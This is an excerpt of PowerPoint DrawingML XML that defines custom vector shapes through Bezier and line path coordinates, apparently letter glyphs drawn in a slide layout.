                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="8" y="2"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="2"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="4" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="4" y="6"/>
                        <a:pt x="6" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="8" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="9" y="12"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="15"/>
                        <a:pt x="8" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="16"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="15"/>
                        <a:pt x="1" y="15"/>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37"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9331325" y="4627563"/>
                  <a:ext cx="22225" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 10"/>
                    <a:gd name="T1" fmla="*/ 0 h 16"/>
                    <a:gd name="T2" fmla="*/ 3 w 10"/>
                    <a:gd name="T3" fmla="*/ 0 h 16"/>
                    <a:gd name="T4" fmla="*/ 7 w 10"/>
                    <a:gd name="T5" fmla="*/ 1 h 16"/>
                    <a:gd name="T6" fmla="*/ 9 w 10"/>
                    <a:gd name="T7" fmla="*/ 2 h 16"/>
                    <a:gd name="T8" fmla="*/ 10 w 10"/>
                    <a:gd name="T9" fmla="*/ 5 h 16"/>
                    <a:gd name="T10" fmla="*/ 9 w 10"/>
                    <a:gd name="T11" fmla="*/ 7 h 16"/>
                    <a:gd name="T12" fmla="*/ 6 w 10"/>
                    <a:gd name="T13" fmla="*/ 9 h 16"/>
                    <a:gd name="T14" fmla="*/ 2 w 10"/>
                    <a:gd name="T15" fmla="*/ 9 h 16"/>
                    <a:gd name="T16" fmla="*/ 1 w 10"/>
                    <a:gd name="T17" fmla="*/ 9 h 16"/>
                    <a:gd name="T18" fmla="*/ 1 w 10"/>
                    <a:gd name="T19" fmla="*/ 16 h 16"/>
                    <a:gd name="T20" fmla="*/ 0 w 10"/>
                    <a:gd name="T21" fmla="*/ 16 h 16"/>
                    <a:gd name="T22" fmla="*/ 0 w 10"/>
                    <a:gd name="T23" fmla="*/ 0 h 16"/>
                    <a:gd name="T24" fmla="*/ 1 w 10"/>
                    <a:gd name="T25" fmla="*/ 2 h 16"/>
                    <a:gd name="T26" fmla="*/ 1 w 10"/>
                    <a:gd name="T27" fmla="*/ 7 h 16"/>
                    <a:gd name="T28" fmla="*/ 4 w 10"/>
                    <a:gd name="T29" fmla="*/ 7 h 16"/>
                    <a:gd name="T30" fmla="*/ 6 w 10"/>
                    <a:gd name="T31" fmla="*/ 7 h 16"/>
                    <a:gd name="T32" fmla="*/ 8 w 10"/>
                    <a:gd name="T33" fmla="*/ 6 h 16"/>
                    <a:gd name="T34" fmla="*/ 8 w 10"/>
                    <a:gd name="T35" fmla="*/ 5 h 16"/>
                    <a:gd name="T36" fmla="*/ 8 w 10"/>
                    <a:gd name="T37" fmla="*/ 3 h 16"/>
                    <a:gd name="T38" fmla="*/ 6 w 10"/>
                    <a:gd name="T39" fmla="*/ 2 h 16"/>
                    <a:gd name="T40" fmla="*/ 4 w 10"/>
                    <a:gd name="T41" fmla="*/ 2 h 16"/>
                    <a:gd name="T42" fmla="*/ 1 w 10"/>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6">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="10" y="4"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="6"/>
                        <a:pt x="9" y="7"/>
                        <a:pt x="9" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="8"/>
                        <a:pt x="7" y="8"/>
                        <a:pt x="6" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="9"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="9"/>
                        <a:pt x="1" y="9"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="16"/>
                        <a:pt x="1" y="16"/>
                        <a:pt x="1" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="7"/>
                        <a:pt x="6" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="7"/>
                        <a:pt x="7" y="7"/>
                        <a:pt x="8" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="5"/>
                        <a:pt x="8" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="2"/>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38"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9361488" y="4627563"/>
                  <a:ext cx="20638" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 13 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 2 h 23"/>
                    <a:gd name="T6" fmla="*/ 1 w 13"/>
                    <a:gd name="T7" fmla="*/ 2 h 23"/>
                    <a:gd name="T8" fmla="*/ 1 w 13"/>
                    <a:gd name="T9" fmla="*/ 10 h 23"/>
                    <a:gd name="T10" fmla="*/ 13 w 13"/>
                    <a:gd name="T11" fmla="*/ 10 h 23"/>
                    <a:gd name="T12" fmla="*/ 13 w 13"/>
                    <a:gd name="T13" fmla="*/ 11 h 23"/>
                    <a:gd name="T14" fmla="*/ 1 w 13"/>
                    <a:gd name="T15" fmla="*/ 11 h 23"/>
                    <a:gd name="T16" fmla="*/ 1 w 13"/>
                    <a:gd name="T17" fmla="*/ 21 h 23"/>
                    <a:gd name="T18" fmla="*/ 13 w 13"/>
                    <a:gd name="T19" fmla="*/ 21 h 23"/>
                    <a:gd name="T20" fmla="*/ 13 w 13"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 0 w 13"/>
                    <a:gd name="T23" fmla="*/ 23 h 23"/>
                    <a:gd name="T24" fmla="*/ 0 w 13"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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39"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9386888" y="4627563"/>
                  <a:ext cx="36513" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 16"/>
                    <a:gd name="T1" fmla="*/ 3 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 16"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 12 w 16"/>
                    <a:gd name="T5" fmla="*/ 2 h 17"/>
                    <a:gd name="T6" fmla="*/ 9 w 16"/>
                    <a:gd name="T7" fmla="*/ 1 h 17"/>
                    <a:gd name="T8" fmla="*/ 5 w 16"/>
                    <a:gd name="T9" fmla="*/ 2 h 17"/>
                    <a:gd name="T10" fmla="*/ 3 w 16"/>
                    <a:gd name="T11" fmla="*/ 5 h 17"/>
                    <a:gd name="T12" fmla="*/ 2 w 16"/>
                    <a:gd name="T13" fmla="*/ 8 h 17"/>
                    <a:gd name="T14" fmla="*/ 4 w 16"/>
                    <a:gd name="T15" fmla="*/ 13 h 17"/>
                    <a:gd name="T16" fmla="*/ 9 w 16"/>
                    <a:gd name="T17" fmla="*/ 15 h 17"/>
                    <a:gd name="T18" fmla="*/ 14 w 16"/>
                    <a:gd name="T19" fmla="*/ 13 h 17"/>
                    <a:gd name="T20" fmla="*/ 16 w 16"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 13 w 16"/>
                    <a:gd name="T23" fmla="*/ 16 h 17"/>
                    <a:gd name="T24" fmla="*/ 9 w 16"/>
                    <a:gd name="T25" fmla="*/ 17 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 16"/>
                    <a:gd name="T27" fmla="*/ 14 h 17"/>
                    <a:gd name="T28" fmla="*/ 0 w 16"/>
                    <a:gd name="T29" fmla="*/ 8 h 17"/>
                    <a:gd name="T30" fmla="*/ 3 w 16"/>
                    <a:gd name="T31" fmla="*/ 2 h 17"/>
                    <a:gd name="T32" fmla="*/ 9 w 16"/>
                    <a:gd name="T33" fmla="*/ 0 h 17"/>
                    <a:gd name="T34" fmla="*/ 13 w 16"/>
                    <a:gd name="T35" fmla="*/ 1 h 17"/>
                    <a:gd name="T36" fmla="*/ 16 w 16"/>
                    <a:gd name="T3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17">
                      <a:moveTo>
                        <a:pt x="16" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="3"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="1"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="4" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="9" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="15"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="14"/>
                        <a:pt x="16" y="14"/>
                        <a:pt x="16" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="15"/>
                        <a:pt x="14" y="15"/>
                        <a:pt x="13" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="16"/>
                        <a:pt x="10" y="17"/>
                        <a:pt x="9" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="12"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="12" y="0"/>
                        <a:pt x="13" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="1"/>
                        <a:pt x="15" y="2"/>
                        <a:pt x="1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240"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9429750" y="4627563"/>
                  <a:ext cx="3175"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41"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9442450" y="4627563"/>
                  <a:ext cx="17463" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 11"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 11 w 11"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 11 w 11"/>
                    <a:gd name="T5" fmla="*/ 2 h 23"/>
                    <a:gd name="T6" fmla="*/ 3 w 11"/>
                    <a:gd name="T7" fmla="*/ 2 h 23"/>
                    <a:gd name="T8" fmla="*/ 3 w 11"/>
                    <a:gd name="T9" fmla="*/ 10 h 23"/>
                    <a:gd name="T10" fmla="*/ 11 w 11"/>
                    <a:gd name="T11" fmla="*/ 10 h 23"/>
                    <a:gd name="T12" fmla="*/ 11 w 11"/>
                    <a:gd name="T13" fmla="*/ 11 h 23"/>
                    <a:gd name="T14" fmla="*/ 3 w 11"/>
                    <a:gd name="T15" fmla="*/ 11 h 23"/>
                    <a:gd name="T16" fmla="*/ 3 w 11"/>
                    <a:gd name="T17" fmla="*/ 23 h 23"/>
                    <a:gd name="T18" fmla="*/ 0 w 11"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 0 w 11"/>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23">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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242"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9467850" y="4627563"/>
                  <a:ext cx="1588"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43"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9477375" y="4627563"/>
                  <a:ext cx="36513" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 16"/>
                    <a:gd name="T1" fmla="*/ 3 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 16"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 12 w 16"/>
                    <a:gd name="T5" fmla="*/ 2 h 17"/>
                    <a:gd name="T6" fmla="*/ 9 w 16"/>
                    <a:gd name="T7" fmla="*/ 1 h 17"/>
                    <a:gd name="T8" fmla="*/ 5 w 16"/>
                    <a:gd name="T9" fmla="*/ 2 h 17"/>
                    <a:gd name="T10" fmla="*/ 3 w 16"/>
                    <a:gd name="T11" fmla="*/ 5 h 17"/>
                    <a:gd name="T12" fmla="*/ 2 w 16"/>
                    <a:gd name="T13" fmla="*/ 8 h 17"/>
                    <a:gd name="T14" fmla="*/ 4 w 16"/>
                    <a:gd name="T15" fmla="*/ 13 h 17"/>
                    <a:gd name="T16" fmla="*/ 9 w 16"/>
                    <a:gd name="T17" fmla="*/ 15 h 17"/>
                    <a:gd name="T18" fmla="*/ 14 w 16"/>
                    <a:gd name="T19" fmla="*/ 13 h 17"/>
                    <a:gd name="T20" fmla="*/ 16 w 16"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 13 w 16"/>
                    <a:gd name="T23" fmla="*/ 16 h 17"/>
                    <a:gd name="T24" fmla="*/ 9 w 16"/>
                    <a:gd name="T25" fmla="*/ 17 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 16"/>
                    <a:gd name="T27" fmla="*/ 14 h 17"/>
                    <a:gd name="T28" fmla="*/ 0 w 16"/>
                    <a:gd name="T29" fmla="*/ 8 h 17"/>
                    <a:gd name="T30" fmla="*/ 3 w 16"/>
                    <a:gd name="T31" fmla="*/ 2 h 17"/>
                    <a:gd name="T32" fmla="*/ 9 w 16"/>
                    <a:gd name="T33" fmla="*/ 0 h 17"/>
                    <a:gd name="T34" fmla="*/ 13 w 16"/>
                    <a:gd name="T35" fmla="*/ 1 h 17"/>
                    <a:gd name="T36" fmla="*/ 16 w 16"/>
                    <a:gd name="T3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17">
                      <a:moveTo>
                        <a:pt x="16" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="3"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="1"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="4" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="9" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="15"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="14"/>
                        <a:pt x="16" y="14"/>
                        <a:pt x="16" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="15"/>
                        <a:pt x="14" y="15"/>
                        <a:pt x="13" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="16"/>
                        <a:pt x="10" y="17"/>
                        <a:pt x="9" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="12"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="12" y="0"/>
                        <a:pt x="13" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="1"/>
                        <a:pt x="15" y="2"/>
                        <a:pt x="1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44"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9534525" y="4627563"/>
                  <a:ext cx="19050" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 12 w 12"/>
                    <a:gd name="T5" fmla="*/ 2 h 23"/>
                    <a:gd name="T6" fmla="*/ 3 w 12"/>
                    <a:gd name="T7" fmla="*/ 2 h 23"/>
                    <a:gd name="T8" fmla="*/ 3 w 12"/>
                    <a:gd name="T9" fmla="*/ 10 h 23"/>
                    <a:gd name="T10" fmla="*/ 12 w 12"/>
                    <a:gd name="T11" fmla="*/ 10 h 23"/>
                    <a:gd name="T12" fmla="*/ 12 w 12"/>
                    <a:gd name="T13" fmla="*/ 11 h 23"/>
                    <a:gd name="T14" fmla="*/ 3 w 12"/>
                    <a:gd name="T15" fmla="*/ 11 h 23"/>
                    <a:gd name="T16" fmla="*/ 3 w 12"/>
                    <a:gd name="T17" fmla="*/ 23 h 23"/>
                    <a:gd name="T18" fmla="*/ 0 w 12"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 0 w 12"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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45"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9556750" y="4627563"/>
                  <a:ext cx="34925" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 22"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 22 w 22"/>
                    <a:gd name="T3" fmla="*/ 23 h 23"/>
                    <a:gd name="T4" fmla="*/ 19 w 22"/>
                    <a:gd name="T5" fmla="*/ 23 h 23"/>
                    <a:gd name="T6" fmla="*/ 16 w 22"/>
                    <a:gd name="T7" fmla="*/ 16 h 23"/>
                    <a:gd name="T8" fmla="*/ 6 w 22"/>
                    <a:gd name="T9" fmla="*/ 16 h 23"/>
                    <a:gd name="T10" fmla="*/ 2 w 22"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 22"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 11 w 22"/>
                    <a:gd name="T15" fmla="*/ 0 h 23"/>
                    <a:gd name="T16" fmla="*/ 12 w 22"/>
                    <a:gd name="T17" fmla="*/ 0 h 23"/>
                    <a:gd name="T18" fmla="*/ 11 w 22"/>
                    <a:gd name="T19" fmla="*/ 5 h 23"/>
                    <a:gd name="T20" fmla="*/ 8 w 22"/>
                    <a:gd name="T21" fmla="*/ 14 h 23"/>
                    <a:gd name="T22" fmla="*/ 15 w 22"/>
                    <a:gd name="T23" fmla="*/ 14 h 23"/>
                    <a:gd name="T24" fmla="*/ 11 w 22"/>
                    <a:gd name="T2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2" y="0"/>
